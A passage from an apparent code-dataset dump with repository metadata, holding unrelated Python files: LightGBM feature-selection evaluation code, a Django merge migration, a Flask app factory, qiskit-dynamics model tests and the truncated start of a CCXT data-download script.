    # One row per CV fold: column 0 = accuracy, column 1 = macro F1.
    # The same buffer is overwritten for each feature subset.
    cv_info = np.zeros((cv, 2))
    skf = StratifiedKFold(n_splits=cv, shuffle=True, random_state=42)
    #Each feature selected by SFFS
    for i, features in enumerate(l, start=1):
        X_step = X[features].values
        #Cross validation for each step
        for j, (train_idx, valid_idx) in enumerate(skf.split(X_step, y)):
            X_train, y_train = X_step[train_idx], y[train_idx]
            X_valid, y_valid = X_step[valid_idx], y[valid_idx]
            #Resample if required
            # Resampling is applied to the training fold only, so the
            # validation fold keeps the original class distribution.
            if balance_method:
                X_train, y_train = balance_method.fit_resample(X_train, y_train)
            model = lgbm.LGBMClassifier()
            model.fit(X_train, y_train)
            y_pred = model.predict(X_valid)
            cv_info[j, 0] = accuracy_score(y_valid, y_pred)
            cv_info[j, 1] = f1_score(y_valid, y_pred, average='macro')
        info_di[i] = {
            'feature_names' : features,
            'mean_acc' : np.mean(cv_info[:, 0]),
            'std_acc' : np.std(cv_info[:, 0]),
            'mean_f1' : np.mean(cv_info[:, 1]),
            'std_f1' : np.std(cv_info[:, 1]),
        }
    # Transpose so each feature-subset size becomes one row.
    return pd.DataFrame.from_dict(info_di).T
def plot_SFFS(scores, save=True):
    '''
    Plot accuracy and macro-F1 (with std-dev error bars) against the number
    of features selected by SFFS. If save is True the figure is written to
    Plots/FeatureSelection/SFFS.png.

    Input:
        scores: the dataframe with SFFS results
    Output:
        The plot of SFFS results
    '''
    figure = plt.figure(figsize=(8, 6))
    plt.errorbar(scores.index, scores['mean_acc'],
                 yerr=scores['std_acc'], label='Accuracy', linewidth=2)
    plt.errorbar(scores.index, scores['mean_f1'],
                 yerr=scores['std_f1'], label='F1_score', linewidth=2)
    plt.legend(loc='upper left')
    plt.ylabel('Metric value')
    plt.xlabel('Features used')
    plt.grid(True)
    if save:
        plt.savefig('Plots/FeatureSelection/SFFS.png',
                    dpi=figure.dpi, bbox_inches='tight')
    return plt.show()
| 0 | 0 | 0 |
9d8b56b7dd586d93afc47913b1898f5ab7883e14 | 341 | py | Python | tagging/migrations/0004_merge_20180921_1247.py | strugo/django-tagging | c7720535556c5f15aef0aaf392000b0c97965537 | [
"BSD-3-Clause"
] | 1 | 2021-02-14T18:49:18.000Z | 2021-02-14T18:49:18.000Z | tagging/migrations/0004_merge_20180921_1247.py | strugo/django-tagging | c7720535556c5f15aef0aaf392000b0c97965537 | [
"BSD-3-Clause"
] | null | null | null | tagging/migrations/0004_merge_20180921_1247.py | strugo/django-tagging | c7720535556c5f15aef0aaf392000b0c97965537 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-09-21 12:47
from __future__ import unicode_literals
from django.db import migrations
| 20.058824 | 49 | 0.665689 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-09-21 12:47
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Merge migration: unifies the two divergent 0003_* branches of the
    'tagging' app's migration history. No schema operations are performed."""
    dependencies = [
        ('tagging', '0003_adapt_max_tag_length'),
        ('tagging', '0003_auto_20161115_0906'),
    ]
    operations = [
    ]
| 0 | 169 | 23 |
d136f1527e08ce39d7b8a7e660f9c6532911f3ed | 1,509 | py | Python | shopyo/app.py | MrSunshyne/shopyo | cd3fe9942841743007f109e51469e8497680a678 | [
"MIT"
] | 1 | 2020-04-05T13:03:11.000Z | 2020-04-05T13:03:11.000Z | shopyo/app.py | MrSunshyne/shopyo | cd3fe9942841743007f109e51469e8497680a678 | [
"MIT"
] | null | null | null | shopyo/app.py | MrSunshyne/shopyo | cd3fe9942841743007f109e51469e8497680a678 | [
"MIT"
] | null | null | null | from flask import Flask, redirect
from flask_wtf.csrf import CSRFProtect
from addon import db, login_manager, ma
from config import app_config
app = create_app('development')
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0')
| 30.795918 | 69 | 0.777336 | from flask import Flask, redirect
from flask_wtf.csrf import CSRFProtect
from addon import db, login_manager, ma
from config import app_config
def create_app(config_name):
    """Flask application factory.

    Builds the app for the given config name ('development', etc.), wires up
    the shared extensions (SQLAlchemy, Marshmallow, login manager, CSRF) and
    registers every module blueprint. Returns the configured app.
    """
    app = Flask(__name__)
    app.config.from_object(app_config[config_name])
    db.init_app(app)
    ma.init_app(app)
    login_manager.init_app(app)
    csrf = CSRFProtect(app)  # noqa
    # Blueprints are imported here rather than at module top — presumably to
    # avoid circular imports between modules and the app; verify before moving.
    from modules.manufacturer.manufac import manufac_blueprint
    from modules.products.products import prod_blueprint
    from modules.settings.settings_modif import settings_blueprint
    from modules.appointment.appointment import appointment_blueprint
    from modules.people.people import people_blueprint
    from modules.admin.admin_modif import admin_blueprint
    from modules.login.login import login_blueprint
    from modules.save.save import save_blueprint
    from modules.base.base import base_blueprint
    app.register_blueprint(manufac_blueprint)
    app.register_blueprint(prod_blueprint)
    app.register_blueprint(settings_blueprint)
    app.register_blueprint(appointment_blueprint)
    app.register_blueprint(people_blueprint)
    app.register_blueprint(admin_blueprint)
    app.register_blueprint(login_blueprint)
    app.register_blueprint(save_blueprint)
    app.register_blueprint(base_blueprint)
    @app.route('/')
    def index():
        # Root URL redirects to the configured home page.
        return redirect(app_config[config_name].HOMEPAGE_URL)
    return app
# Module-level app instance (development config) used by the dev server.
app = create_app('development')
if __name__ == '__main__':
    # Dev server only: binds all interfaces with debug enabled.
    app.run(debug=True, host='0.0.0.0')
| 1,238 | 0 | 23 |
0489731e34107e54ace58ece45592ae663e898e0 | 13,780 | py | Python | test/dynamics/models/test_generator_models.py | mtreinish/qiskit-dynamics | 1c2abca01e4f1bf4c66431103340ecd6c5f67817 | [
"Apache-2.0"
] | null | null | null | test/dynamics/models/test_generator_models.py | mtreinish/qiskit-dynamics | 1c2abca01e4f1bf4c66431103340ecd6c5f67817 | [
"Apache-2.0"
] | null | null | null | test/dynamics/models/test_generator_models.py | mtreinish/qiskit-dynamics | 1c2abca01e4f1bf4c66431103340ecd6c5f67817 | [
"Apache-2.0"
] | null | null | null | # This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
# pylint: disable=invalid-name
"""Tests for operator_models.py"""
import numpy as np
from scipy.linalg import expm
from qiskit import QiskitError
from qiskit.quantum_info.operators import Operator
from qiskit_dynamics.models import GeneratorModel
from qiskit_dynamics.models.generator_models import CallableGenerator
from qiskit_dynamics.signals import Signal
from qiskit_dynamics.dispatch import Array
from ..common import QiskitDynamicsTestCase, TestJaxBase
class TestGeneratorModel(QiskitDynamicsTestCase):
"""Tests for GeneratorModel."""
def test_frame_operator_errors(self):
"""Check different modes of error raising for frame setting."""
# 1d array
try:
self.basic_model.frame = Array([1.0, 1.0])
except QiskitError as e:
self.assertTrue("anti-Hermitian" in str(e))
# 2d array
try:
self.basic_model.frame = Array([[1.0, 0.0], [0.0, 1.0]])
except QiskitError as e:
self.assertTrue("anti-Hermitian" in str(e))
# Operator
try:
self.basic_model.frame = self.Z
except QiskitError as e:
self.assertTrue("anti-Hermitian" in str(e))
def test_diag_frame_operator_basic_model(self):
"""Test setting a diagonal frame operator for the internally
set up basic model.
"""
self._basic_frame_evaluate_test(Array([1j, -1j]), 1.123)
self._basic_frame_evaluate_test(Array([1j, -1j]), np.pi)
def test_non_diag_frame_operator_basic_model(self):
"""Test setting a non-diagonal frame operator for the internally
set up basic model.
"""
self._basic_frame_evaluate_test(-1j * (self.Y + self.Z), 1.123)
self._basic_frame_evaluate_test(-1j * (self.Y - self.Z), np.pi)
def _basic_frame_evaluate_test(self, frame_operator, t):
"""Routine for testing setting of valid frame operators using the
basic_model.
"""
self.basic_model.frame = frame_operator
# convert to 2d array
if isinstance(frame_operator, Operator):
frame_operator = Array(frame_operator.data)
if isinstance(frame_operator, Array) and frame_operator.ndim == 1:
frame_operator = np.diag(frame_operator)
value = self.basic_model.evaluate(t)
i2pi = -1j * 2 * np.pi
U = expm(-np.array(frame_operator) * t)
# drive coefficient
d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
# manually evaluate frame
expected = (
i2pi * self.w * U @ self.Z.data @ U.conj().transpose() / 2
+ d_coeff * i2pi * U @ self.X.data @ U.conj().transpose() / 2
- frame_operator
)
self.assertAllClose(value, expected)
def test_evaluate_no_frame_basic_model(self):
"""Test evaluation without a frame in the basic model."""
t = 3.21412
value = self.basic_model.evaluate(t)
i2pi = -1j * 2 * np.pi
d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
expected = i2pi * self.w * self.Z.data / 2 + i2pi * d_coeff * self.X.data / 2
self.assertAllClose(value, expected)
def test_evaluate_in_frame_basis_basic_model(self):
"""Test evaluation in frame basis in the basic_model."""
frame_op = -1j * (self.X + 0.2 * self.Y + 0.1 * self.Z).data
# enter the frame given by the -1j * X
self.basic_model.frame = frame_op
# get the frame basis that is used in model
_, U = np.linalg.eigh(1j * frame_op)
t = 3.21412
value = self.basic_model.evaluate(t, in_frame_basis=True)
# compose the frame basis transformation with the exponential
# frame rotation (this will be multiplied on the right)
U = expm(np.array(frame_op) * t) @ U
Uadj = U.conj().transpose()
i2pi = -1j * 2 * np.pi
d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
expected = (
Uadj
@ (i2pi * self.w * self.Z.data / 2 + i2pi * d_coeff * self.X.data / 2 - frame_op)
@ U
)
self.assertAllClose(value, expected)
def test_evaluate_pseudorandom(self):
"""Test evaluate with pseudorandom inputs."""
rng = np.random.default_rng(30493)
num_terms = 3
dim = 5
b = 1.0 # bound on size of random terms
rand_op = rng.uniform(low=-b, high=b, size=(dim, dim)) + 1j * rng.uniform(
low=-b, high=b, size=(dim, dim)
)
frame_op = Array(rand_op - rand_op.conj().transpose())
randoperators = rng.uniform(low=-b, high=b, size=(num_terms, dim, dim)) + 1j * rng.uniform(
low=-b, high=b, size=(num_terms, dim, dim)
)
rand_coeffs = Array(
rng.uniform(low=-b, high=b, size=(num_terms))
+ 1j * rng.uniform(low=-b, high=b, size=(num_terms))
)
rand_carriers = Array(rng.uniform(low=-b, high=b, size=(num_terms)))
rand_phases = Array(rng.uniform(low=-b, high=b, size=(num_terms)))
self._test_evaluate(frame_op, randoperators, rand_coeffs, rand_carriers, rand_phases)
rng = np.random.default_rng(94818)
num_terms = 5
dim = 10
b = 1.0 # bound on size of random terms
rand_op = rng.uniform(low=-b, high=b, size=(dim, dim)) + 1j * rng.uniform(
low=-b, high=b, size=(dim, dim)
)
frame_op = Array(rand_op - rand_op.conj().transpose())
randoperators = Array(
rng.uniform(low=-b, high=b, size=(num_terms, dim, dim))
+ 1j * rng.uniform(low=-b, high=b, size=(num_terms, dim, dim))
)
rand_coeffs = Array(
rng.uniform(low=-b, high=b, size=(num_terms))
+ 1j * rng.uniform(low=-b, high=b, size=(num_terms))
)
rand_carriers = Array(rng.uniform(low=-b, high=b, size=(num_terms)))
rand_phases = Array(rng.uniform(low=-b, high=b, size=(num_terms)))
self._test_evaluate(frame_op, randoperators, rand_coeffs, rand_carriers, rand_phases)
def test_lmult_rmult_no_frame_basic_model(self):
"""Test evaluation with no frame in the basic model."""
y0 = np.array([[1.0, 2.0], [0.0, 4.0]])
t = 3.21412
i2pi = -1j * 2 * np.pi
d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
model_expected = i2pi * self.w * self.Z.data / 2 + i2pi * d_coeff * self.X.data / 2
self.assertAllClose(self.basic_model.lmult(t, y0), model_expected @ y0)
self.assertAllClose(self.basic_model.rmult(t, y0), y0 @ model_expected)
def test_signal_setting(self):
"""Test updating the signals."""
signals = [Signal(lambda t: 2 * t, 1.0), Signal(lambda t: t ** 2, 2.0)]
self.basic_model.signals = signals
t = 0.1
value = self.basic_model.evaluate(t)
i2pi = -1j * 2 * np.pi
Z_coeff = (2 * t) * np.cos(2 * np.pi * 1 * t)
X_coeff = self.r * (t ** 2) * np.cos(2 * np.pi * 2 * t)
expected = i2pi * Z_coeff * self.Z.data / 2 + i2pi * X_coeff * self.X.data / 2
self.assertAllClose(value, expected)
def test_signal_setting_None(self):
"""Test setting signals to None"""
self.basic_model.signals = None
self.assertTrue(self.basic_model.signals is None)
def test_signal_setting_incorrect_length(self):
"""Test error being raised if signals is the wrong length."""
try:
self.basic_model.signals = [1.0]
except QiskitError as e:
self.assertTrue("same length" in str(e))
def test_drift(self):
"""Test drift evaluation."""
self.assertAllClose(self.basic_model.drift, -1j * 2 * np.pi * self.w * self.Z.data / 2)
def test_drift_error_in_frame(self):
"""Test raising of error if drift is requested in a frame."""
self.basic_model.frame = self.basic_model.drift
try:
self.basic_model.drift
except QiskitError as e:
self.assertTrue("ill-defined" in str(e))
def test_cutoff_freq(self):
"""Test evaluation with a cutoff frequency."""
# enter frame of drift
self.basic_model.frame = self.basic_model.drift
# set cutoff freq to 2 * drive freq (standard RWA)
self.basic_model.cutoff_freq = 2 * self.w
# result should just be the X term halved
eval_rwa = self.basic_model.evaluate(2.0)
expected = -1j * 2 * np.pi * (self.r / 2) * self.X.data / 2
self.assertAllClose(eval_rwa, expected)
self.basic_model.signals = [self.w, Signal(drive_func, self.w)]
# result should now contain both X and Y terms halved
t = 2.1231 * np.pi
dRe = np.real(drive_func(t))
dIm = np.imag(drive_func(t))
eval_rwa = self.basic_model.evaluate(t)
expected = (
-1j * 2 * np.pi * (self.r / 2) * dRe * self.X.data / 2
+ -1j * 2 * np.pi * (self.r / 2) * dIm * self.Y.data / 2
)
self.assertAllClose(eval_rwa, expected)
def assertAllClose(self, A, B, rtol=1e-8, atol=1e-8):
"""Call np.allclose and assert true."""
self.assertTrue(np.allclose(A, B, rtol=rtol, atol=atol))
class TestGeneratorModelJax(TestGeneratorModel, TestJaxBase):
"""Jax version of TestGeneratorModel tests.
Note: This class has no body but contains tests due to inheritance.
"""
class TestCallableGenerator(QiskitDynamicsTestCase):
"""Tests for CallableGenerator."""
def test_diag_frame_operator_basic_model(self):
"""Test setting a diagonal frame operator for the internally
set up basic model.
"""
self._basic_frame_evaluate_test(Array([1j, -1j]), 1.123)
self._basic_frame_evaluate_test(Array([1j, -1j]), np.pi)
def test_non_diag_frame_operator_basic_model(self):
"""Test setting a non-diagonal frame operator for the internally
set up basic model.
"""
self._basic_frame_evaluate_test(-1j * (self.Y + self.Z), 1.123)
self._basic_frame_evaluate_test(-1j * (self.Y - self.Z), np.pi)
def _basic_frame_evaluate_test(self, frame_operator, t):
"""Routine for testing setting of valid frame operators using the
basic_model.
"""
self.basic_model.frame = frame_operator
# convert to 2d array
if isinstance(frame_operator, Operator):
frame_operator = Array(frame_operator.data)
if isinstance(frame_operator, Array) and frame_operator.ndim == 1:
frame_operator = np.diag(frame_operator)
value = self.basic_model.evaluate(t)
i2pi = -1j * 2 * np.pi
U = expm(-np.array(frame_operator) * t)
# drive coefficient
d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
# manually evaluate frame
expected = (
i2pi * self.w * U @ self.Z.data @ U.conj().transpose() / 2
+ d_coeff * i2pi * U @ self.X.data @ U.conj().transpose() / 2
- frame_operator
)
self.assertAllClose(value, expected)
class TestCallableGeneratorJax(TestCallableGenerator, TestJaxBase):
"""Jax version of TestCallableGenerator tests.
Note: This class has no body but contains tests due to inheritance.
"""
| 35.153061 | 99 | 0.603338 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
# pylint: disable=invalid-name
"""Tests for operator_models.py"""
import numpy as np
from scipy.linalg import expm
from qiskit import QiskitError
from qiskit.quantum_info.operators import Operator
from qiskit_dynamics.models import GeneratorModel
from qiskit_dynamics.models.generator_models import CallableGenerator
from qiskit_dynamics.signals import Signal
from qiskit_dynamics.dispatch import Array
from ..common import QiskitDynamicsTestCase, TestJaxBase
class TestGeneratorModel(QiskitDynamicsTestCase):
"""Tests for GeneratorModel."""
def setUp(self):
self.X = Array(Operator.from_label("X").data)
self.Y = Array(Operator.from_label("Y").data)
self.Z = Array(Operator.from_label("Z").data)
# define a basic model
w = 2.0
r = 0.5
operators = [-1j * 2 * np.pi * self.Z / 2, -1j * 2 * np.pi * r * self.X / 2]
signals = [w, Signal(1.0, w)]
self.w = 2
self.r = r
self.basic_model = GeneratorModel(operators=operators, signals=signals)
def test_frame_operator_errors(self):
"""Check different modes of error raising for frame setting."""
# 1d array
try:
self.basic_model.frame = Array([1.0, 1.0])
except QiskitError as e:
self.assertTrue("anti-Hermitian" in str(e))
# 2d array
try:
self.basic_model.frame = Array([[1.0, 0.0], [0.0, 1.0]])
except QiskitError as e:
self.assertTrue("anti-Hermitian" in str(e))
# Operator
try:
self.basic_model.frame = self.Z
except QiskitError as e:
self.assertTrue("anti-Hermitian" in str(e))
def test_diag_frame_operator_basic_model(self):
"""Test setting a diagonal frame operator for the internally
set up basic model.
"""
self._basic_frame_evaluate_test(Array([1j, -1j]), 1.123)
self._basic_frame_evaluate_test(Array([1j, -1j]), np.pi)
def test_non_diag_frame_operator_basic_model(self):
"""Test setting a non-diagonal frame operator for the internally
set up basic model.
"""
self._basic_frame_evaluate_test(-1j * (self.Y + self.Z), 1.123)
self._basic_frame_evaluate_test(-1j * (self.Y - self.Z), np.pi)
def _basic_frame_evaluate_test(self, frame_operator, t):
"""Routine for testing setting of valid frame operators using the
basic_model.
"""
self.basic_model.frame = frame_operator
# convert to 2d array
if isinstance(frame_operator, Operator):
frame_operator = Array(frame_operator.data)
if isinstance(frame_operator, Array) and frame_operator.ndim == 1:
frame_operator = np.diag(frame_operator)
value = self.basic_model.evaluate(t)
i2pi = -1j * 2 * np.pi
U = expm(-np.array(frame_operator) * t)
# drive coefficient
d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
# manually evaluate frame
expected = (
i2pi * self.w * U @ self.Z.data @ U.conj().transpose() / 2
+ d_coeff * i2pi * U @ self.X.data @ U.conj().transpose() / 2
- frame_operator
)
self.assertAllClose(value, expected)
def test_evaluate_no_frame_basic_model(self):
"""Test evaluation without a frame in the basic model."""
t = 3.21412
value = self.basic_model.evaluate(t)
i2pi = -1j * 2 * np.pi
d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
expected = i2pi * self.w * self.Z.data / 2 + i2pi * d_coeff * self.X.data / 2
self.assertAllClose(value, expected)
def test_evaluate_in_frame_basis_basic_model(self):
"""Test evaluation in frame basis in the basic_model."""
frame_op = -1j * (self.X + 0.2 * self.Y + 0.1 * self.Z).data
# enter the frame given by the -1j * X
self.basic_model.frame = frame_op
# get the frame basis that is used in model
_, U = np.linalg.eigh(1j * frame_op)
t = 3.21412
value = self.basic_model.evaluate(t, in_frame_basis=True)
# compose the frame basis transformation with the exponential
# frame rotation (this will be multiplied on the right)
U = expm(np.array(frame_op) * t) @ U
Uadj = U.conj().transpose()
i2pi = -1j * 2 * np.pi
d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
expected = (
Uadj
@ (i2pi * self.w * self.Z.data / 2 + i2pi * d_coeff * self.X.data / 2 - frame_op)
@ U
)
self.assertAllClose(value, expected)
def test_evaluate_pseudorandom(self):
"""Test evaluate with pseudorandom inputs."""
rng = np.random.default_rng(30493)
num_terms = 3
dim = 5
b = 1.0 # bound on size of random terms
rand_op = rng.uniform(low=-b, high=b, size=(dim, dim)) + 1j * rng.uniform(
low=-b, high=b, size=(dim, dim)
)
frame_op = Array(rand_op - rand_op.conj().transpose())
randoperators = rng.uniform(low=-b, high=b, size=(num_terms, dim, dim)) + 1j * rng.uniform(
low=-b, high=b, size=(num_terms, dim, dim)
)
rand_coeffs = Array(
rng.uniform(low=-b, high=b, size=(num_terms))
+ 1j * rng.uniform(low=-b, high=b, size=(num_terms))
)
rand_carriers = Array(rng.uniform(low=-b, high=b, size=(num_terms)))
rand_phases = Array(rng.uniform(low=-b, high=b, size=(num_terms)))
self._test_evaluate(frame_op, randoperators, rand_coeffs, rand_carriers, rand_phases)
rng = np.random.default_rng(94818)
num_terms = 5
dim = 10
b = 1.0 # bound on size of random terms
rand_op = rng.uniform(low=-b, high=b, size=(dim, dim)) + 1j * rng.uniform(
low=-b, high=b, size=(dim, dim)
)
frame_op = Array(rand_op - rand_op.conj().transpose())
randoperators = Array(
rng.uniform(low=-b, high=b, size=(num_terms, dim, dim))
+ 1j * rng.uniform(low=-b, high=b, size=(num_terms, dim, dim))
)
rand_coeffs = Array(
rng.uniform(low=-b, high=b, size=(num_terms))
+ 1j * rng.uniform(low=-b, high=b, size=(num_terms))
)
rand_carriers = Array(rng.uniform(low=-b, high=b, size=(num_terms)))
rand_phases = Array(rng.uniform(low=-b, high=b, size=(num_terms)))
self._test_evaluate(frame_op, randoperators, rand_coeffs, rand_carriers, rand_phases)
def _test_evaluate(self, frame_op, operators, coefficients, carriers, phases):
sig_list = []
for coeff, freq, phase in zip(coefficients, carriers, phases):
def get_env_func(coeff=coeff):
# pylint: disable=unused-argument
def env(t):
return coeff
return env
sig_list.append(Signal(get_env_func(), freq, phase))
model = GeneratorModel(operators, sig_list, frame=frame_op)
value = model.evaluate(1.0)
coeffs = np.real(coefficients * np.exp(1j * 2 * np.pi * carriers * 1.0 + 1j * phases))
expected = (
expm(-np.array(frame_op))
@ np.tensordot(coeffs, operators, axes=1)
@ expm(np.array(frame_op))
- frame_op
)
self.assertAllClose(value, expected)
def test_lmult_rmult_no_frame_basic_model(self):
"""Test evaluation with no frame in the basic model."""
y0 = np.array([[1.0, 2.0], [0.0, 4.0]])
t = 3.21412
i2pi = -1j * 2 * np.pi
d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
model_expected = i2pi * self.w * self.Z.data / 2 + i2pi * d_coeff * self.X.data / 2
self.assertAllClose(self.basic_model.lmult(t, y0), model_expected @ y0)
self.assertAllClose(self.basic_model.rmult(t, y0), y0 @ model_expected)
def test_signal_setting(self):
"""Test updating the signals."""
signals = [Signal(lambda t: 2 * t, 1.0), Signal(lambda t: t ** 2, 2.0)]
self.basic_model.signals = signals
t = 0.1
value = self.basic_model.evaluate(t)
i2pi = -1j * 2 * np.pi
Z_coeff = (2 * t) * np.cos(2 * np.pi * 1 * t)
X_coeff = self.r * (t ** 2) * np.cos(2 * np.pi * 2 * t)
expected = i2pi * Z_coeff * self.Z.data / 2 + i2pi * X_coeff * self.X.data / 2
self.assertAllClose(value, expected)
def test_signal_setting_None(self):
"""Test setting signals to None"""
self.basic_model.signals = None
self.assertTrue(self.basic_model.signals is None)
def test_signal_setting_incorrect_length(self):
"""Test error being raised if signals is the wrong length."""
try:
self.basic_model.signals = [1.0]
except QiskitError as e:
self.assertTrue("same length" in str(e))
def test_drift(self):
"""Test drift evaluation."""
self.assertAllClose(self.basic_model.drift, -1j * 2 * np.pi * self.w * self.Z.data / 2)
def test_drift_error_in_frame(self):
"""Test raising of error if drift is requested in a frame."""
self.basic_model.frame = self.basic_model.drift
try:
self.basic_model.drift
except QiskitError as e:
self.assertTrue("ill-defined" in str(e))
def test_cutoff_freq(self):
"""Test evaluation with a cutoff frequency."""
# enter frame of drift
self.basic_model.frame = self.basic_model.drift
# set cutoff freq to 2 * drive freq (standard RWA)
self.basic_model.cutoff_freq = 2 * self.w
# result should just be the X term halved
eval_rwa = self.basic_model.evaluate(2.0)
expected = -1j * 2 * np.pi * (self.r / 2) * self.X.data / 2
self.assertAllClose(eval_rwa, expected)
def drive_func(t):
return t ** 2 + t ** 3 * 1j
self.basic_model.signals = [self.w, Signal(drive_func, self.w)]
# result should now contain both X and Y terms halved
t = 2.1231 * np.pi
dRe = np.real(drive_func(t))
dIm = np.imag(drive_func(t))
eval_rwa = self.basic_model.evaluate(t)
expected = (
-1j * 2 * np.pi * (self.r / 2) * dRe * self.X.data / 2
+ -1j * 2 * np.pi * (self.r / 2) * dIm * self.Y.data / 2
)
self.assertAllClose(eval_rwa, expected)
def assertAllClose(self, A, B, rtol=1e-8, atol=1e-8):
"""Call np.allclose and assert true."""
self.assertTrue(np.allclose(A, B, rtol=rtol, atol=atol))
class TestGeneratorModelJax(TestGeneratorModel, TestJaxBase):
    """Jax version of TestGeneratorModel tests.

    Note: This class has no body of its own; every test method is
    inherited from TestGeneratorModel and re-run with the Jax setup
    mixed in via TestJaxBase.
    """
class TestCallableGenerator(QiskitDynamicsTestCase):
    """Tests for CallableGenerator."""
    def setUp(self):
        # Single-qubit Pauli operators used throughout the tests.
        self.X = Array(Operator.from_label("X").data)
        self.Y = Array(Operator.from_label("Y").data)
        self.Z = Array(Operator.from_label("Z").data)
        # define a basic model
        w = Array(2.0)
        r = Array(0.5)
        operators = [-1j * 2 * np.pi * self.Z / 2, -1j * 2 * np.pi * r * self.X / 2]
        def generator(t):
            # Drift Z term plus a cosine-modulated X drive term.
            return w * operators[0] + np.cos(2 * np.pi * w * t) * operators[1]
        self.w = 2
        self.r = r
        self.basic_model = CallableGenerator(generator)
    def test_diag_frame_operator_basic_model(self):
        """Test setting a diagonal frame operator for the internally
        set up basic model.
        """
        self._basic_frame_evaluate_test(Array([1j, -1j]), 1.123)
        self._basic_frame_evaluate_test(Array([1j, -1j]), np.pi)
    def test_non_diag_frame_operator_basic_model(self):
        """Test setting a non-diagonal frame operator for the internally
        set up basic model.
        """
        self._basic_frame_evaluate_test(-1j * (self.Y + self.Z), 1.123)
        self._basic_frame_evaluate_test(-1j * (self.Y - self.Z), np.pi)
    def _basic_frame_evaluate_test(self, frame_operator, t):
        """Routine for testing setting of valid frame operators using the
        basic_model.

        Compares model evaluation at time t against a manual computation
        of the generator conjugated into the frame of frame_operator.
        """
        self.basic_model.frame = frame_operator
        # convert to 2d array
        if isinstance(frame_operator, Operator):
            frame_operator = Array(frame_operator.data)
        if isinstance(frame_operator, Array) and frame_operator.ndim == 1:
            frame_operator = np.diag(frame_operator)
        value = self.basic_model.evaluate(t)
        i2pi = -1j * 2 * np.pi
        U = expm(-np.array(frame_operator) * t)
        # drive coefficient
        d_coeff = self.r * np.cos(2 * np.pi * self.w * t)
        # manually evaluate frame
        expected = (
            i2pi * self.w * U @ self.Z.data @ U.conj().transpose() / 2
            + d_coeff * i2pi * U @ self.X.data @ U.conj().transpose() / 2
            - frame_operator
        )
        self.assertAllClose(value, expected)
class TestCallableGeneratorJax(TestCallableGenerator, TestJaxBase):
    """Jax version of TestCallableGenerator tests.

    Note: This class has no body of its own; every test method is
    inherited from TestCallableGenerator and re-run with the Jax setup
    mixed in via TestJaxBase.
    """
| 1,852 | 0 | 112 |
7dbb46434026418f35f91a9285c0767203877e0b | 4,354 | py | Python | im_v2/ccxt/data/extract/download_historical_data.py | alphamatic/amp | 5018137097159415c10eaa659a2e0de8c4e403d4 | [
"BSD-3-Clause"
] | 5 | 2021-08-10T23:16:44.000Z | 2022-03-17T17:27:00.000Z | im_v2/ccxt/data/extract/download_historical_data.py | alphamatic/amp | 5018137097159415c10eaa659a2e0de8c4e403d4 | [
"BSD-3-Clause"
] | 330 | 2021-06-10T17:28:22.000Z | 2022-03-31T00:55:48.000Z | im_v2/ccxt/data/extract/download_historical_data.py | alphamatic/amp | 5018137097159415c10eaa659a2e0de8c4e403d4 | [
"BSD-3-Clause"
] | 6 | 2021-06-10T17:20:32.000Z | 2022-03-28T08:08:03.000Z | #!/usr/bin/env python
"""
Script to download historical data from CCXT.
Use as:
# Download data for CCXT for trading universe `v03` from 2019-01-01 to now:
> download_historical_data.py \
--dst_dir 'test' \
--universe 'v03' \
--start_datetime '2019-01-01'
Import as:
import im_v2.ccxt.data.extract.download_historical_data as imvcdedhda
"""
import argparse
import logging
import os
import time
import pandas as pd
import helpers.hdbg as hdbg
import helpers.hio as hio
import helpers.hparser as hparser
import im_v2.ccxt.data.extract.exchange_class as imvcdeexcl
import im_v2.ccxt.universe.universe as imvccunun
_LOG = logging.getLogger(__name__)
if __name__ == "__main__":
_main(_parse())
| 30.447552 | 80 | 0.628158 | #!/usr/bin/env python
"""
Script to download historical data from CCXT.
Use as:
# Download data for CCXT for trading universe `v03` from 2019-01-01 to now:
> download_historical_data.py \
--dst_dir 'test' \
--universe 'v03' \
--start_datetime '2019-01-01'
Import as:
import im_v2.ccxt.data.extract.download_historical_data as imvcdedhda
"""
import argparse
import logging
import os
import time
import pandas as pd
import helpers.hdbg as hdbg
import helpers.hio as hio
import helpers.hparser as hparser
import im_v2.ccxt.data.extract.exchange_class as imvcdeexcl
import im_v2.ccxt.universe.universe as imvccunun
_LOG = logging.getLogger(__name__)
def _parse() -> argparse.ArgumentParser:
    """Build the command-line parser for this download script.

    Required flags: --dst_dir, --universe, --start_datetime.
    Optional flags: --api_keys, --end_datetime (defaults to "now"),
    --step, --sleep_time, --incremental, plus the verbosity flag added
    by hparser.add_verbosity_arg.
    """
    parser = argparse.ArgumentParser(
        description=__doc__,
        formatter_class=argparse.RawTextHelpFormatter,
    )
    parser.add_argument(
        "--dst_dir",
        action="store",
        required=True,
        type=str,
        help="Folder to download files to",
    )
    parser.add_argument(
        "--api_keys",
        action="store",
        type=str,
        default=imvcdeexcl.API_KEYS_PATH,
        help="Path to JSON file that contains API keys for exchange access",
    )
    parser.add_argument(
        "--universe",
        action="store",
        required=True,
        type=str,
        help="Trade universe to download data for, e.g. 'latest', '01'",
    )
    parser.add_argument(
        "--start_datetime",
        action="store",
        required=True,
        type=str,
        help="Start date of download to parse with pd.Timestamp",
    )
    parser.add_argument(
